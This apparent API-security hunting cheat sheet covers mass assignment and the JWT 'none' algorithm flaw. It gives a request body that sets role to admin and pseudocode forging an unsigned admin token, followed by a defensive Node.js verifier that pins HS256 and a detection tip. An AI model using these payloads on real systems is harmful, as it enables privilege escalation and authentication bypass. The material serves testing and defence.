hunt-api-misconfig
12. API SECURITY MISCONFIGURATION
Mass Assignment
User.update(req.body) // body has {"role": "admin"} → privilege escalation
JWT None Algorithm
header = {"alg": "none", "typ": "JWT"}
payload = {"sub": 1, "role": "admin"}
token = base64(header) + "." + base64(payload) + "." # no signature
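A defensive counterpart to the unsigned token above, as an added example that is not part of the original page: a Node.js verifier that pins the algorithm server-side, so a token whose header says "none" is rejected before any signature logic runs. The function names, the secret and the sample tokens are constructed for illustration.

```javascript
const crypto = require('crypto');

const b64url = (data) => Buffer.from(data).toString('base64url');
const parseJson = (seg) => JSON.parse(Buffer.from(seg, 'base64url').toString('utf8'));

// Issue an HS256 token (used here only to build a valid sample).
function signHS256(payload, secret) {
  const head = b64url(JSON.stringify({ alg: 'HS256', typ: 'JWT' }));
  const body = b64url(JSON.stringify(payload));
  const sig = crypto.createHmac('sha256', secret).update(`${head}.${body}`).digest();
  return `${head}.${body}.${b64url(sig)}`;
}

// Verify with the algorithm pinned by the server. The header's alg is only
// compared against the pin; it never selects how the token is verified.
function verifyHS256(token, secret) {
  const parts = String(token).split('.');
  if (parts.length !== 3) return { ok: false, reason: 'malformed' };
  const [head, body, sig] = parts;
  let header;
  try { header = parseJson(head); } catch { return { ok: false, reason: 'malformed' }; }
  if (header === null || typeof header !== 'object' || header.alg !== 'HS256') {
    return { ok: false, reason: 'alg not allowed' };
  }
  if (!sig) return { ok: false, reason: 'missing signature' };
  const expected = crypto.createHmac('sha256', secret).update(`${head}.${body}`).digest();
  const given = Buffer.from(sig, 'base64url');
  if (given.length !== expected.length || !crypto.timingSafeEqual(given, expected)) {
    return { ok: false, reason: 'bad signature' };
  }
  try { return { ok: true, claims: parseJson(body) }; } catch { return { ok: false, reason: 'malformed' }; }
}

// Constructed sample inputs: the unsigned token from the text and a valid one.
const SECRET = 'constructed-demo-secret'; // real keys come from a secret store
const unsigned = `${b64url(JSON.stringify({ alg: 'none', typ: 'JWT' }))}.${b64url(JSON.stringify({ sub: 1, role: 'admin' }))}.`;
const valid = signHS256({ sub: 1, role: 'user' }, SECRET);
console.log(verifyHS256(unsigned, SECRET), verifyHS256(valid, SECRET));
```

Logging the `reason` field per request gives a detection signal: repeated "alg not allowed" results from one client indicate someone probing the verifier.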